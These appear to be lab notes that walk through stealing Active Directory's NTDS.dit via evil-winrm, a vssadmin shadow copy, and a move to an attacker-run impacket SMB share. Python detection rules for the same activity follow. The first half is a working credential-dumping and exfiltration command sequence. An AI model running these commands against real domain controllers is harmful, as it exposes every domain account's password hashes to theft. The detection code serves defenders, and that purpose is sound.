Copying NTDS.dit via evil-winrm

# Attacker Machine
./evil-winrm.rb -i 10.129.202.85 -u jmarston -p 'P@ssword!'

# Checking for local group membership
net localgroup

# Checking the user's account details and group memberships
net user jmarston

# NTDS.dit is locked while the DC is running, so create a volume shadow copy of C: and copy from that
vssadmin CREATE SHADOW /For=C:

# Create a directory C:\NTDS and copy NTDS.dit out of the shadow copy
# (HarddiskVolumeShadowCopy2 is the shadow copy volume name reported by the vssadmin command above)
mkdir C:\NTDS
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

# Before fetching ntds.dit, create a directory on the attacker machine
# and start an SMB server that shares it (share name: NTDSFileShare)
mkdir TmpDirectory
sudo impacket-smbserver -smb2support NTDSFileShare TmpDirectory

# Then move the file to the share on the attacker machine (the share name must match the one created above)
cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\NTDSFileShare
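From the defender's side, the sequence above leaves a distinctive process-creation trail on the domain controller: a vssadmin shadow creation, a copy that reads NTDS.dit through a HarddiskVolumeShadowCopy path, and a move of NTDS.dit to a UNC share, all spawned under the WinRM host process. The Python below is an added example (not part of these notes) that runs simple detection logic over constructed sample events shaped like Security 4688 / Sysmon process-creation records, then correlates per host and user so that shadow creation followed by an NTDS.dit read from that shadow copy is raised as a single high-severity alert. The event field names and the parent-process check on wsmprovhost.exe are assumptions of this example.

```python
import json
import re

# Constructed sample events (process-creation records, 4688 / Sysmon EID 1 style);
# not real telemetry. The first three mirror the commands in these notes.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "jmarston", "parent": "wsmprovhost.exe",
     "cmd": "vssadmin CREATE SHADOW /For=C:"},
    {"host": "DC01", "user": "jmarston", "parent": "wsmprovhost.exe",
     "cmd": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"},
    {"host": "DC01", "user": "jmarston", "parent": "wsmprovhost.exe",
     "cmd": r"cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\NTDSFileShare"},
    {"host": "DC01", "user": "SYSTEM", "parent": "services.exe",
     "cmd": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"host": "WS07", "user": "alice", "parent": "explorer.exe",
     "cmd": r"notepad.exe C:\Users\alice\notes.txt"},
]

# Each rule is (name, case-insensitive regex over the command line).
RULES = [
    # vssadmin creating a shadow copy (any argument order between the keywords)
    ("shadow_copy_created",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\b.*\bshadow\b", re.I)),
    # ntds.dit being read through a shadow-copy device path
    ("ntds_read_from_shadow_copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*\\ntds\.dit", re.I)),
    # ntds.dit referenced together with a UNC destination (\\host\share)
    ("ntds_to_unc_path",
     re.compile(r"\bntds\.dit\b.*\\\\[^\\]+\\", re.I)),
]

# Assumed name of the WinRM plugin host that parents remote commands.
WINRM_HOST_PROCESS = "wsmprovhost.exe"


def scan_events(events):
    """Return one finding per (event, rule) match, annotated with WinRM context."""
    findings = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                findings.append({
                    "rule": name,
                    "host": ev["host"],
                    "user": ev["user"],
                    "via_winrm": ev["parent"].lower() == WINRM_HOST_PROCESS,
                    "cmd": ev["cmd"],
                })
    return findings


def correlate(findings):
    """Group findings by (host, user). Shadow creation plus an NTDS.dit read
    from a shadow copy by the same principal is a high-severity sequence;
    any single rule hit on its own is medium."""
    rules_by_key = {}
    for f in findings:
        rules_by_key.setdefault((f["host"], f["user"]), set()).add(f["rule"])
    alerts = []
    for (host, user), rules in rules_by_key.items():
        high = {"shadow_copy_created", "ntds_read_from_shadow_copy"} <= rules
        alerts.append({
            "host": host,
            "user": user,
            "severity": "high" if high else "medium",
            "rules": sorted(rules),
        })
    return alerts


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for h in hits:
        print(json.dumps(h))
    for a in correlate(hits):
        print(json.dumps(a))
```

The regexes deliberately key on the shadow-copy device path and the NTDS.dit filename rather than on the exact commands shown here, so renamed staging directories or a different shadow copy number still match; legitimate backup software that touches NTDS.dit should be handled with an allow-list on the parent process or account rather than by loosening the rules.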
